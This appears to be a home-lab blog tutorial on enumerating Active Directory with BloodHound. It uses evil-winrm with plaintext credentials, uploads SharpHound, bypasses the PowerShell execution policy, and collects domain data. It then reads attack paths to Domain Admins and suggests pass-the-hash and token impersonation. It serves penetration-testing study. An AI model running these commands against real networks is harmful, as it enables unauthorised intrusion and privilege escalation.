Enumeration by bloodhound
posted on 11 Jul 2022 under category Active-Directory in series Active_Directory
Bloodhound is a tool that is generally used by adversaries to visually map an organization’s Active Directory structure and analyze it to find its weaknesses. Being able to analyze the Active Directory is very useful to attackers to identify which objects are worth targeting in an organization. Any user within an active directory domain can interrogate their organization’s Active Directory which runs on the domain controllers.
Bloodhound uses the collector which is called as SharpHound to collect various kinds of data by running a ton of LDAP queries to collect information within Active Directory.
ruby evil-winrm.rb -i 192.168.1.2 -u superman -p 'Password123!'
[+] Dll-Loader
[+] Donut-Loader
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
upload /home/kali/Desktop/AD/SharpHound.ps1
PowerShell -ep bypass # bypass policy powershell
ls # to see the script
. .\SharpHound.ps1 # to run script
Invoke-Bloodhound -CollectionMethod All -Domain Homelab.local -ZipFileName homelab.local.zip
download 20220823031653_homlab.local.zip
next step install Bloodhound
apt install bloodhound
sudo neo4j console
sudo neo4j console
Bloodhound
Back on your BloodHound instance login and upload the hound.zip file via the up arrow to the right of the screen. Once imported click the 3 lines at the top left of the window to view the Database info. This shows you the AD info and relationships etc. we have three tab database , node info and Important one is Analysis
To Graph the data, go to the Analysis tab and choose what you would like to enumerate.
By clicking on a node you can bring up the properties of that node
Selecting “Find Shortest Paths to Domain Admins”. This shows the shortest route to get to Domain Administrator. We can see that ecartman, who is a domain administrator is logged into machine SOUTHPARK.PWNME.LOCAL so this would be a perfect target to maybe try passing a hash and using Token Impersonation to login to the Domain Controller etc.
To further demonstrate the power of Blood hound, this is a result of selecting Shortest Paths to High Value Targets. This is a lab with less than 10 users and computers. Imagine a coorperate network with hundreds… This post has shown a very small fraction of what BloodHound is capable of.